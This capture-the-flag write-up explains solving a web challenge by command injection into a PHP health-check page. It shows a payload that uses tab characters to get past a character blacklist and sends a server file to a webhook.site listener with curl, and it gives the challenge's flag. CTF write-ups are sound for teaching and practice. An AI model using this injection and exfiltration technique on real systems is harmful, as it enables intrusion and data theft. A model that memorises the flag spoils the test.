Healthcheck

We were given a suspiciously wholesome-looking page at:

http://104.214.185.119/index.php

It's titled "Health Check Your Webpage", but deep down, we all knew this wasn't about HTTP wellness. Our job? Dig up something the dev left behind, their “hopes and dreams” (literally it says, "I left my hopes_and_dreams on the server.").

So, we open the given source code and what do we find? This:

Something like command Injection vibes. Especially since shell_exec() is used. But wait, there's a blacklist:

No ;, &, |, or even $. Brutal. Like trying to eat soup with a fork.

At first, we tried every command injection trick in the book:

· http://127.0.0.1/hopes_and_dreams

· http://104.214.185.119/index.php/hopes_and_dreams

· http://example.com http://127.0.0.1/hopes_and_dreams -o /var/www/html/hopes_and_dreams

But… nothing. It only gives back HTTP status codes like 200, 301. No body content. No error output. Just silence hmmm.

That’s because the output of curl was redirected to /dev/null:

So, all the actual response body is thrown away.

We stopped thinking like a hacker. We started thinking like a hacker with a network. If we can't see the flag directly… why not send it to ourselves?

We used Webhook.site, a free service that gives us a unique endpoint to collect requests.

Then, we crafted this payload:

http://127.0.0.1/;	curl	-X	POST	-d	@hopes_and_dreams https://webhook.site/<our-unique-id>

We hit submit, went back to webhook.site, and there it was, sitting like a jewel in the logs:

That -o /dev/null part discards the body. So even if cat /flag or curl /flag worked, we’d never see the output in the response.

But what if we told the vulnerable server to make its own HTTP request to somewhere we can monitor?

That’s where webhook.site comes in. It's our external listener. We use it as a “data exfiltration endpoint”.

By telling the target to:

curl -X POST -d @hopes_and_dreams https://webhook.site/...

…it reads the contents of the hopes_and_dreams file and sends it as a POST request body to our webhook. No output is shown in the browser, but we don’t need it. The data is sent to us.

Flag: umcs{n1c3_j0b_ste4l1ng_myh0p3_4nd_dr3ams}

PreviousWEB NextStraightforward

Last updated 8 months ago